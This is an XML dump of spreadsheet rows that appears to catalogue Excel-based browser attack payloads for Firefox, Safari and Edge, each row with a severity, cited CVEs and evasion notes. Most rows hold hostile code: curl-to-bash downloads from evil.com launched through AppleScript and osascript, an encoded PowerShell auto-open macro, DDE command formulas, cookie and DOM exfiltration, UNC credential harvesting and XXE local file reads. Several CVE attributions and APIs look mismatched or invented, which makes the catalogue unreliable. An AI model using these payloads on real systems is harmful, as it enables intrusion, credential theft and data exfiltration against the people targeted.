        </is>
      </c>
      <c r="E15" t="inlineStr">
        <is>
          <t>outlook_integration_abuse</t>
        </is>
      </c>
      <c r="F15" t="inlineStr">
        <is>
          <t>Office.context.mailbox.item.subject.setAsync('Data Exfil: ' + btoa(document.documentElement.outerHTML)); Office.context.mailbox.item.to.setAsync([{emailAddress: 'attacker@evil.com'}]);</t>
        </is>
      </c>
      <c r="G15" t="inlineStr">
        <is>
          <t>Office 365 Web Excel Outlook integration abuse for email-based data exfiltration</t>
        </is>
      </c>
      <c r="H15" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="I15" t="inlineStr">
        <is>
          <t>CVE-2021-31199, CVE-2021-42321, CVE-2022-21989</t>
        </is>
      </c>
      <c r="J15" t="inlineStr">
        <is>
          <t>Office 365 Excel can use Outlook integration for email composition</t>
        </is>
      </c>
      <c r="K15" t="inlineStr">
        <is>
          <t>Outlook integration appears as legitimate email functionality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FIREFOX - Excel Browser Rendering Payloads</t>
        </is>
      </c>
    </row>
    <row r="2">
      <c r="A2" t="inlineStr">
        <is>
          <t>Total firefox Excel payloads: 11</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" t="inlineStr">
        <is>
          <t>Focus: Firefox Excel handling - Plugin-based rendering, Gecko engine exploitation, XPCOM interface abuse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excel_browser_0003</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>macro_execution</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>firefox</t>
        </is>
      </c>
      <c r="D5" s="5" t="inlineStr">
        <is>
          <t>xlsm_macro</t>
        </is>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>auto_open_macro</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>Sub Auto_Open()
Shell "powershell -enc &lt;base64_payload&gt;"
End Sub</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr">
        <is>
          <t>Firefox Excel macro auto-execution via xlsm file download</t>
        </is>
      </c>
      <c r="H5" s="5" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I5" s="5" t="inlineStr">
        <is>
          <t>CVE-2021-40444, CVE-2021-42292</t>
        </is>
      </c>
      <c r="J5" s="5" t="inlineStr">
        <is>
          <t>Firefox downloads xlsm files, Excel opens with macro execution if enabled</t>
        </is>
      </c>
      <c r="K5" s="5" t="inlineStr">
        <is>
          <t>Social engineering to enable macros, trusted publisher certificates</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" t="inlineStr">
        <is>
          <t>excel_browser_0008</t>
        </is>
      </c>
      <c r="B6" t="inlineStr">
        <is>
          <t>formula_injection</t>
        </is>
      </c>
      <c r="C6" t="inlineStr">
        <is>
          <t>firefox</t>
        </is>
      </c>
      <c r="D6" t="inlineStr">
        <is>
          <t>xls_legacy</t>
        </is>
      </c>
      <c r="E6" t="inlineStr">
        <is>
          <t>hyperlink_injection</t>
        </is>
      </c>
      <c r="F6">
        <f>HYPERLINK("https://evil.com/redirect","Click Here")</f>
        <v/>
      </c>
      <c r="G6" t="inlineStr">
        <is>
          <t>Firefox Excel legacy hyperlink injection for phishing and tracking</t>
        </is>
      </c>
      <c r="H6" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="I6" t="inlineStr">
        <is>
          <t>CVE-2018-4878, CVE-2019-17026</t>
        </is>
      </c>
      <c r="J6" t="inlineStr">
        <is>
          <t>Firefox processes Excel hyperlinks, can redirect to malicious sites</t>
        </is>
      </c>
      <c r="K6" t="inlineStr">
        <is>
          <t>Legitimate-looking hyperlink text, trusted Excel file source</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" t="inlineStr">
        <is>
          <t>excel_browser_0014</t>
        </is>
      </c>
      <c r="B7" t="inlineStr">
        <is>
          <t>browser_dom_access</t>
        </is>
      </c>
      <c r="C7" t="inlineStr">
        <is>
          <t>firefox</t>
        </is>
      </c>
      <c r="D7" t="inlineStr">
        <is>
          <t>xlsm_macro</t>
        </is>
      </c>
      <c r="E7" t="inlineStr">
        <is>
          <t>iframe_injection</t>
        </is>
      </c>
      <c r="F7" t="inlineStr">
        <is>
          <t>Sub IframeInject()
CreateObject("InternetExplorer.Application").Navigate("javascript:parent.frames[0].location='https://evil.com'")
End Sub</t>
        </is>
      </c>
      <c r="G7" t="inlineStr">
        <is>
          <t>Firefox Excel macro iframe injection for parent frame navigation control</t>
        </is>
      </c>
      <c r="H7" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="I7" t="inlineStr">
        <is>
          <t>CVE-2019-11707, CVE-2020-12387</t>
        </is>
      </c>
      <c r="J7" t="inlineStr">
        <is>
          <t>Firefox Excel macros can create IE objects for DOM manipulation</t>
        </is>
      </c>
      <c r="K7" t="inlineStr">
        <is>
          <t>Macro appears to create legitimate browser automation, parent frame access</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" t="inlineStr">
        <is>
          <t>excel_browser_0021</t>
        </is>
      </c>
      <c r="B8" t="inlineStr">
        <is>
          <t>formula_injection</t>
        </is>
      </c>
      <c r="C8" t="inlineStr">
        <is>
          <t>firefox</t>
        </is>
      </c>
      <c r="D8" t="inlineStr">
        <is>
          <t>xls_legacy</t>
        </is>
      </c>
      <c r="E8" t="inlineStr">
        <is>
          <t>mscomctl_activex_abuse</t>
        </is>
      </c>
      <c r="F8">
        <f>mscomctl|'ocx.CommonDialog'!A1</f>
        <v/>
      </c>
      <c r="G8" t="inlineStr">
        <is>
          <t>Firefox Excel legacy ActiveX CommonDialog abuse for file system access</t>
        </is>
      </c>
      <c r="H8" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I8" t="inlineStr">
        <is>
          <t>CVE-2018-4878, CVE-2019-17026</t>
        </is>
      </c>
      <c r="J8" t="inlineStr">
        <is>
          <t>Firefox processes legacy ActiveX controls in Excel files</t>
        </is>
      </c>
      <c r="K8" t="inlineStr">
        <is>
          <t>Legacy .xls format enables older ActiveX controls</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" t="inlineStr">
        <is>
          <t>excel_browser_0026</t>
        </is>
      </c>
      <c r="B9" t="inlineStr">
        <is>
          <t>browser_dom_access</t>
        </is>
      </c>
      <c r="C9" t="inlineStr">
        <is>
          <t>firefox</t>
        </is>
      </c>
      <c r="D9" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E9" t="inlineStr">
        <is>
          <t>firefox_webextension_abuse</t>
        </is>
      </c>
      <c r="F9" t="inlineStr">
        <is>
          <t>browser.tabs.executeScript({code: "window.location='https://evil.com/steal?data='+btoa(document.body.innerHTML)"});</t>
        </is>
      </c>
      <c r="G9" t="inlineStr">
        <is>
          <t>Firefox Excel web extension API abuse for tab manipulation and data theft</t>
        </is>
      </c>
      <c r="H9" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="I9" t="inlineStr">
        <is>
          <t>CVE-2019-11707, CVE-2020-12387</t>
        </is>
      </c>
      <c r="J9" t="inlineStr">
        <is>
          <t>Firefox web extensions can manipulate tabs when Excel files trigger extension</t>
        </is>
      </c>
      <c r="K9" t="inlineStr">
        <is>
          <t>Web extension appears legitimate, cross-tab data access</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" t="inlineStr">
        <is>
          <t>excel_browser_0031</t>
        </is>
      </c>
      <c r="B10" t="inlineStr">
        <is>
          <t>formula_injection</t>
        </is>
      </c>
      <c r="C10" t="inlineStr">
        <is>
          <t>firefox</t>
        </is>
      </c>
      <c r="D10" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E10" t="inlineStr">
        <is>
          <t>indirect_cell_reference</t>
        </is>
      </c>
      <c r="F10">
        <f>INDIRECT("R"&amp;ROW()&amp;"C"&amp;COLUMN()+1,FALSE)&amp;"=cmd|'/c calc'!A1"</f>
        <v/>
      </c>
      <c r="G10" t="inlineStr">
        <is>
          <t>Firefox Excel INDIRECT function abuse for dynamic formula construction</t>
        </is>
      </c>
      <c r="H10" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I10" t="inlineStr">
        <is>
          <t>CVE-2018-4878, CVE-2019-17026</t>
        </is>
      </c>
      <c r="J10" t="inlineStr">
        <is>
          <t>Firefox Excel INDIRECT function can construct formulas dynamically</t>
        </is>
      </c>
      <c r="K10" t="inlineStr">
        <is>
          <t>Dynamic formula construction evades static analysis</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" t="inlineStr">
        <is>
          <t>excel_browser_0037</t>
        </is>
      </c>
      <c r="B11" t="inlineStr">
        <is>
          <t>formula_injection</t>
        </is>
      </c>
      <c r="C11" t="inlineStr">
        <is>
          <t>firefox</t>
        </is>
      </c>
      <c r="D11" t="inlineStr">
        <is>
          <t>xls_legacy</t>
        </is>
      </c>
      <c r="E11" t="inlineStr">
        <is>
          <t>firefox_xpcom_abuse</t>
        </is>
      </c>
      <c r="F11">
        <f>CALL("xpcom","@mozilla.org/file/local;1","createInstance","nsILocalFile")|A1</f>
        <v/>
      </c>
      <c r="G11" t="inlineStr">
        <is>
          <t>Firefox Excel XPCOM interface abuse for file system access</t>
        </is>
      </c>
      <c r="H11" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I11" t="inlineStr">
        <is>
          <t>CVE-2018-4878, CVE-2019-17026</t>
        </is>
      </c>
      <c r="J11" t="inlineStr">
        <is>
          <t>Firefox legacy Excel support can access XPCOM interfaces</t>
        </is>
      </c>
      <c r="K11" t="inlineStr">
        <is>
          <t>XPCOM appears as Firefox internal API, file system access</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" t="inlineStr">
        <is>
          <t>excel_browser_0042</t>
        </is>
      </c>
      <c r="B12" t="inlineStr">
        <is>
          <t>browser_dom_access</t>
        </is>
      </c>
      <c r="C12" t="inlineStr">
        <is>
          <t>firefox</t>
        </is>
      </c>
      <c r="D12" t="inlineStr">
        <is>
          <t>xlsm_macro</t>
        </is>
      </c>
      <c r="E12" t="inlineStr">
        <is>
          <t>firefox_addon_sdk_abuse</t>
        </is>
      </c>
      <c r="F12" t="inlineStr">
        <is>
          <t>const {Cc, Ci} = require('chrome');
Cc['@mozilla.org/observer-service;1'].getService(Ci.nsIObserverService).notifyObservers(null, 'http-on-modify-request', 'https://evil.com');</t>
        </is>
      </c>
      <c r="G12" t="inlineStr">
        <is>
          <t>Firefox Excel Add-on SDK abuse for HTTP request interception and modification</t>
        </is>
      </c>
      <c r="H12" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="I12" t="inlineStr">
        <is>
          <t>CVE-2019-11707, CVE-2020-12387</t>
        </is>
      </c>
      <c r="J12" t="inlineStr">
        <is>
          <t>Firefox Add-on SDK can intercept and modify HTTP requests</t>
        </is>
      </c>
      <c r="K12" t="inlineStr">
        <is>
          <t>Add-on SDK appears as legitimate browser extension functionality</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" t="inlineStr">
        <is>
          <t>excel_browser_0049</t>
        </is>
      </c>
      <c r="B13" t="inlineStr">
        <is>
          <t>xml_external_entity</t>
        </is>
      </c>
      <c r="C13" t="inlineStr">
        <is>
          <t>firefox</t>
        </is>
      </c>
      <c r="D13" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E13" t="inlineStr">
        <is>
          <t>gecko_xml_entity_expansion</t>
        </is>
      </c>
      <c r="F13" t="inlineStr">
        <is>
          <t>&lt;!DOCTYPE root [&lt;!ENTITY lol "lol"&gt;&lt;!ENTITY lol2 "&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;"&gt;]&gt;&lt;root&gt;&amp;lol2;&lt;/root&gt;</t>
        </is>
      </c>
      <c r="G13" t="inlineStr">
        <is>
          <t>Firefox Excel Gecko XML entity expansion for denial of service and resource exhaustion</t>
        </is>
      </c>
      <c r="H13" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="I13" t="inlineStr">
        <is>
          <t>CVE-2018-4878, CVE-2019-17026, CVE-2020-12387</t>
        </is>
      </c>
      <c r="J13" t="inlineStr">
        <is>
          <t>Firefox Gecko engine processes XML entity expansion in Excel files</t>
        </is>
      </c>
      <c r="K13" t="inlineStr">
        <is>
          <t>Entity expansion causes resource exhaustion before detection</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" t="inlineStr">
        <is>
          <t>excel_browser_0054</t>
        </is>
      </c>
      <c r="B14" t="inlineStr">
        <is>
          <t>macro_execution</t>
        </is>
      </c>
      <c r="C14" t="inlineStr">
        <is>
          <t>firefox</t>
        </is>
      </c>
      <c r="D14" t="inlineStr">
        <is>
          <t>xlsm_macro</t>
        </is>
      </c>
      <c r="E14" t="inlineStr">
        <is>
          <t>firefox_webrtc_datachannel_abuse</t>
        </is>
      </c>
      <c r="F14" t="inlineStr">
        <is>
          <t>const pc = new RTCPeerConnection(); const dc = pc.createDataChannel('exfil'); dc.onopen = () =&gt; dc.send(btoa(JSON.stringify({cookies: document.cookie, localStorage: localStorage})));</t>
        </is>
      </c>
      <c r="G14" t="inlineStr">
        <is>
          <t>Firefox Excel WebRTC DataChannel abuse for real-time data exfiltration bypass</t>
        </is>
      </c>
      <c r="H14" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I14" t="inlineStr">
        <is>
          <t>CVE-2018-4878, CVE-2019-17026, CVE-2020-12387</t>
        </is>
      </c>
      <c r="J14" t="inlineStr">
        <is>
          <t>Firefox WebRTC DataChannels can exfiltrate data without HTTP requests</t>
        </is>
      </c>
      <c r="K14" t="inlineStr">
        <is>
          <t>WebRTC bypasses HTTP-based monitoring, real-time data theft</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" t="inlineStr">
        <is>
          <t>excel_browser_0059</t>
        </is>
      </c>
      <c r="B15" t="inlineStr">
        <is>
          <t>external_data_connections</t>
        </is>
      </c>
      <c r="C15" t="inlineStr">
        <is>
          <t>firefox</t>
        </is>
      </c>
      <c r="D15" t="inlineStr">
        <is>
          <t>xls_legacy</t>
        </is>
      </c>
      <c r="E15" t="inlineStr">
        <is>
          <t>firefox_addon_webextension_bypass</t>
        </is>
      </c>
      <c r="F15" t="inlineStr">
        <is>
          <t>browser.tabs.executeScript({code: 'const script = document.createElement("script"); script.src = "https://evil.com/payload.js"; document.head.appendChild(script);'});</t>
        </is>
      </c>
      <c r="G15" t="inlineStr">
        <is>
          <t>Firefox Excel legacy add-on WebExtension bypass for script injection</t>
        </is>
      </c>
      <c r="H15" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I15" t="inlineStr">
        <is>
          <t>CVE-2018-4878, CVE-2019-17026, CVE-2020-12387</t>
        </is>
      </c>
      <c r="J15" t="inlineStr">
        <is>
          <t>Firefox legacy add-ons can bypass WebExtension restrictions</t>
        </is>
      </c>
      <c r="K15" t="inlineStr">
        <is>
          <t>Legacy add-on APIs bypass modern security restrictions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SAFARI - Excel Browser Rendering Payloads</t>
        </is>
      </c>
    </row>
    <row r="2">
      <c r="A2" t="inlineStr">
        <is>
          <t>Total safari Excel payloads: 10</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" t="inlineStr">
        <is>
          <t>Focus: Safari Excel integration - macOS Excel rendering, WebKit engine, NSAppleScript execution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excel_browser_0004</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>external_data_connections</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>safari</t>
        </is>
      </c>
      <c r="D5" s="5" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>external_data_query</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>&lt;dataSource&gt;&lt;connection&gt;&lt;connectionString&gt;Provider=Microsoft.ACE.OLEDB.12.0;Data Source=\\evil.com\share\malicious.xlsx&lt;/connectionString&gt;&lt;/connection&gt;&lt;/dataSource&gt;</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr">
        <is>
          <t>Safari Excel external data connection to UNC path for credential harvesting</t>
        </is>
      </c>
      <c r="H5" s="5" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I5" s="5" t="inlineStr">
        <is>
          <t>CVE-2018-8574, CVE-2019-1446</t>
        </is>
      </c>
      <c r="J5" s="5" t="inlineStr">
        <is>
          <t>Safari opens Excel files with external data connections, attempts UNC authentication</t>
        </is>
      </c>
      <c r="K5" s="5" t="inlineStr">
        <is>
          <t>UNC paths bypass typical URL filtering, harvest NTLM credentials</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" t="inlineStr">
        <is>
          <t>excel_browser_0010</t>
        </is>
      </c>
      <c r="B6" t="inlineStr">
        <is>
          <t>external_data_connections</t>
        </is>
      </c>
      <c r="C6" t="inlineStr">
        <is>
          <t>safari</t>
        </is>
      </c>
      <c r="D6" t="inlineStr">
        <is>
          <t>xlsb_binary</t>
        </is>
      </c>
      <c r="E6" t="inlineStr">
        <is>
          <t>ole_object_embedding</t>
        </is>
      </c>
      <c r="F6" t="inlineStr">
        <is>
          <t>Embedded OLE object: {binary data containing malicious payload}</t>
        </is>
      </c>
      <c r="G6" t="inlineStr">
        <is>
          <t>Safari Excel binary format OLE object embedding for payload delivery</t>
        </is>
      </c>
      <c r="H6" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I6" t="inlineStr">
        <is>
          <t>CVE-2020-1563, CVE-2021-31939</t>
        </is>
      </c>
      <c r="J6" t="inlineStr">
        <is>
          <t>Safari processes xlsb binary format, can execute embedded OLE objects</t>
        </is>
      </c>
      <c r="K6" t="inlineStr">
        <is>
          <t>Binary format obfuscates payload, OLE objects appear as legitimate content</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" t="inlineStr">
        <is>
          <t>excel_browser_0016</t>
        </is>
      </c>
      <c r="B7" t="inlineStr">
        <is>
          <t>formula_injection</t>
        </is>
      </c>
      <c r="C7" t="inlineStr">
        <is>
          <t>safari</t>
        </is>
      </c>
      <c r="D7" t="inlineStr">
        <is>
          <t>xlsb_binary</t>
        </is>
      </c>
      <c r="E7" t="inlineStr">
        <is>
          <t>binary_formula_obfuscation</t>
        </is>
      </c>
      <c r="F7" t="inlineStr">
        <is>
          <t>{Binary encoded: =INDIRECT("R"&amp;ROW()&amp;"C"&amp;COLUMN(),FALSE)&amp;CHAR(61)&amp;"cmd|'/c calc'!A1"}</t>
        </is>
      </c>
      <c r="G7" t="inlineStr">
        <is>
          <t>Safari Excel binary format formula obfuscation for AV evasion</t>
        </is>
      </c>
      <c r="H7" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I7" t="inlineStr">
        <is>
          <t>CVE-2020-1563, CVE-2021-31939</t>
        </is>
      </c>
      <c r="J7" t="inlineStr">
        <is>
          <t>Safari processes xlsb binary formulas, obfuscation bypasses detection</t>
        </is>
      </c>
      <c r="K7" t="inlineStr">
        <is>
          <t>Binary encoding hides malicious formulas, appears as legitimate calculation</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" t="inlineStr">
        <is>
          <t>excel_browser_0020</t>
        </is>
      </c>
      <c r="B8" t="inlineStr">
        <is>
          <t>browser_dom_access</t>
        </is>
      </c>
      <c r="C8" t="inlineStr">
        <is>
          <t>safari</t>
        </is>
      </c>
      <c r="D8" t="inlineStr">
        <is>
          <t>xlsm_macro</t>
        </is>
      </c>
      <c r="E8" t="inlineStr">
        <is>
          <t>safari_webkit_bridge</t>
        </is>
      </c>
      <c r="F8" t="inlineStr">
        <is>
          <t>Sub WebKitBridge()
CreateObject("Safari.Application").Do("javascript:window.location='https://evil.com/harvest?data='+btoa(document.innerHTML)")
End Sub</t>
        </is>
      </c>
      <c r="G8" t="inlineStr">
        <is>
          <t>Safari Excel macro WebKit bridge abuse for DOM access and data harvesting</t>
        </is>
      </c>
      <c r="H8" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="I8" t="inlineStr">
        <is>
          <t>CVE-2019-8761, CVE-2020-9715</t>
        </is>
      </c>
      <c r="J8" t="inlineStr">
        <is>
          <t>Safari Excel macros can interact with WebKit for JavaScript execution</t>
        </is>
      </c>
      <c r="K8" t="inlineStr">
        <is>
          <t>Macro appears to interact with Safari legitimately, DOM data exfiltration</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" t="inlineStr">
        <is>
          <t>excel_browser_0027</t>
        </is>
      </c>
      <c r="B9" t="inlineStr">
        <is>
          <t>formula_injection</t>
        </is>
      </c>
      <c r="C9" t="inlineStr">
        <is>
          <t>safari</t>
        </is>
      </c>
      <c r="D9" t="inlineStr">
        <is>
          <t>xls_legacy</t>
        </is>
      </c>
      <c r="E9" t="inlineStr">
        <is>
          <t>applescript_bridge</t>
        </is>
      </c>
      <c r="F9">
        <f>AppleScript|'tell application "Terminal" to do script "curl https://evil.com/payload.sh | bash"'!A1</f>
        <v/>
      </c>
      <c r="G9" t="inlineStr">
        <is>
          <t>Safari Excel AppleScript bridge for macOS command execution</t>
        </is>
      </c>
      <c r="H9" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I9" t="inlineStr">
        <is>
          <t>CVE-2019-8761, CVE-2020-9715</t>
        </is>
      </c>
      <c r="J9" t="inlineStr">
        <is>
          <t>Safari Excel can execute AppleScript commands on macOS</t>
        </is>
      </c>
      <c r="K9" t="inlineStr">
        <is>
          <t>AppleScript appears as macOS automation, Terminal command execution</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" t="inlineStr">
        <is>
          <t>excel_browser_0033</t>
        </is>
      </c>
      <c r="B10" t="inlineStr">
        <is>
          <t>macro_execution</t>
        </is>
      </c>
      <c r="C10" t="inlineStr">
        <is>
          <t>safari</t>
        </is>
      </c>
      <c r="D10" t="inlineStr">
        <is>
          <t>xlsm_macro</t>
        </is>
      </c>
      <c r="E10" t="inlineStr">
        <is>
          <t>nsapplescript_execution</t>
        </is>
      </c>
      <c r="F10" t="inlineStr">
        <is>
          <t>Set script = CreateObject("AppleScript")
script.ExecuteStatement "do shell script \"curl https://evil.com/payload.sh | bash\""</t>
        </is>
      </c>
      <c r="G10" t="inlineStr">
        <is>
          <t>Safari Excel NSAppleScript execution for macOS shell command injection</t>
        </is>
      </c>
      <c r="H10" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I10" t="inlineStr">
        <is>
          <t>CVE-2019-8761, CVE-2020-9715</t>
        </is>
      </c>
      <c r="J10" t="inlineStr">
        <is>
          <t>Safari Excel macros can execute NSAppleScript for system commands</t>
        </is>
      </c>
      <c r="K10" t="inlineStr">
        <is>
          <t>NSAppleScript appears as macOS automation, shell injection</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" t="inlineStr">
        <is>
          <t>excel_browser_0038</t>
        </is>
      </c>
      <c r="B11" t="inlineStr">
        <is>
          <t>external_data_connections</t>
        </is>
      </c>
      <c r="C11" t="inlineStr">
        <is>
          <t>safari</t>
        </is>
      </c>
      <c r="D11" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E11" t="inlineStr">
        <is>
          <t>safari_url_scheme_abuse</t>
        </is>
      </c>
      <c r="F11" t="inlineStr">
        <is>
          <t>safari-resource://com.apple.Safari/SafariHTML.html?url=https://evil.com/payload.html</t>
        </is>
      </c>
      <c r="G11" t="inlineStr">
        <is>
          <t>Safari Excel URL scheme abuse for custom protocol handling and payload delivery</t>
        </is>
      </c>
      <c r="H11" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="I11" t="inlineStr">
        <is>
          <t>CVE-2019-8761, CVE-2020-9715</t>
        </is>
      </c>
      <c r="J11" t="inlineStr">
        <is>
          <t>Safari Excel can process custom URL schemes for resource loading</t>
        </is>
      </c>
      <c r="K11" t="inlineStr">
        <is>
          <t>Custom URL schemes bypass standard URL filtering</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" t="inlineStr">
        <is>
          <t>excel_browser_0046</t>
        </is>
      </c>
      <c r="B12" t="inlineStr">
        <is>
          <t>formula_injection</t>
        </is>
      </c>
      <c r="C12" t="inlineStr">
        <is>
          <t>safari</t>
        </is>
      </c>
      <c r="D12" t="inlineStr">
        <is>
          <t>xls_legacy</t>
        </is>
      </c>
      <c r="E12" t="inlineStr">
        <is>
          <t>applescript_osascript_injection</t>
        </is>
      </c>
      <c r="F12">
        <f>osascript|'tell application "Terminal" to do script "curl -s https://evil.com/macos.sh | bash"'!A1</f>
        <v/>
      </c>
      <c r="G12" t="inlineStr">
        <is>
          <t>Safari Excel legacy osascript injection for macOS terminal command execution</t>
        </is>
      </c>
      <c r="H12" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="I12" t="inlineStr">
        <is>
          <t>CVE-2019-8761, CVE-2020-9715, CVE-2021-30661</t>
        </is>
      </c>
      <c r="J12" t="inlineStr">
        <is>
          <t>Safari legacy Excel can execute osascript commands directly</t>
        </is>
      </c>
      <c r="K12" t="inlineStr">
        <is>
          <t>osascript appears as macOS automation, terminal execution</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" t="inlineStr">
        <is>
          <t>excel_browser_0052</t>
        </is>
      </c>
      <c r="B13" t="inlineStr">
        <is>
          <t>formula_injection</t>
        </is>
      </c>
      <c r="C13" t="inlineStr">
        <is>
          <t>safari</t>
        </is>
      </c>
      <c r="D13" t="inlineStr">
        <is>
          <t>xlsb_binary</t>
        </is>
      </c>
      <c r="E13" t="inlineStr">
        <is>
          <t>webkit_private_browsing_bypass</t>
        </is>
      </c>
      <c r="F13" t="inlineStr">
        <is>
          <t>webkit.messageHandlers.external.postMessage({action: 'execute', cmd: 'curl https://evil.com/exfil -d @/Users/Shared/sensitive.txt'});</t>
        </is>
      </c>
      <c r="G13" t="inlineStr">
        <is>
          <t>Safari Excel WebKit message handlers abuse for private browsing bypass and file exfiltration</t>
        </is>
      </c>
      <c r="H13" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I13" t="inlineStr">
        <is>
          <t>CVE-2019-8761, CVE-2020-9715, CVE-2021-30661</t>
        </is>
      </c>
      <c r="J13" t="inlineStr">
        <is>
          <t>Safari WebKit message handlers can bypass private browsing restrictions</t>
        </is>
      </c>
      <c r="K13" t="inlineStr">
        <is>
          <t>Message handlers appear as web-app communication, file access</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" t="inlineStr">
        <is>
          <t>excel_browser_0060</t>
        </is>
      </c>
      <c r="B14" t="inlineStr">
        <is>
          <t>macro_execution</t>
        </is>
      </c>
      <c r="C14" t="inlineStr">
        <is>
          <t>safari</t>
        </is>
      </c>
      <c r="D14" t="inlineStr">
        <is>
          <t>xlsm_macro</t>
        </is>
      </c>
      <c r="E14" t="inlineStr">
        <is>
          <t>ios_url_scheme_abuse</t>
        </is>
      </c>
      <c r="F14" t="inlineStr">
        <is>
          <t>window.location = 'shortcuts://run-shortcut?name=ExfilData&amp;input=' + encodeURIComponent(btoa(document.documentElement.innerHTML));</t>
        </is>
      </c>
      <c r="G14" t="inlineStr">
        <is>
          <t>Safari Excel iOS Shortcuts URL scheme abuse for mobile data exfiltration</t>
        </is>
      </c>
      <c r="H14" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="I14" t="inlineStr">
        <is>
          <t>CVE-2019-8761, CVE-2020-9715, CVE-2021-30661</t>
        </is>
      </c>
      <c r="J14" t="inlineStr">
        <is>
          <t>Safari on iOS can trigger Shortcuts app via URL scheme</t>
        </is>
      </c>
      <c r="K14" t="inlineStr">
        <is>
          <t>iOS Shortcuts appear as legitimate automation, mobile data theft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EDGE - Excel Browser Rendering Payloads</t>
        </is>
      </c>
    </row>
    <row r="2">
      <c r="A2" t="inlineStr">
        <is>
          <t>Total edge Excel payloads: 9</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" t="inlineStr">
        <is>
          <t>Focus: Edge Excel integration - Windows integration, WebView2 rendering, ActiveX legacy support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excel_browser_0005</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>xml_external_entity</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>edge</t>
        </is>
      </c>
      <c r="D5" s="5" t="inlineStr">
        <is>
          <t>xlsx_modern</t>
        </is>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>xxe_injection</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>&lt;!DOCTYPE x [&lt;!ENTITY xxe SYSTEM "file:///c:/windows/system32/drivers/etc/hosts"&gt;]&gt;&lt;x&gt;&amp;xxe;&lt;/x&gt;</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr">
        <is>
          <t>Edge Excel XXE injection via malformed xlsx (zip with XML) to read local files</t>
        </is>
      </c>
      <c r="H5" s="5" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="I5" s="5" t="inlineStr">
        <is>
          <t>CVE-2018-8636, CVE-2019-0540</t>
        </is>
      </c>
      <c r="J5" s="5" t="inlineStr">
        <is>
          <t>Edge processes xlsx XML content, XXE can read local files</t>
        </is>
      </c>
      <c r="K5" s="5" t="inlineStr">
        <is>
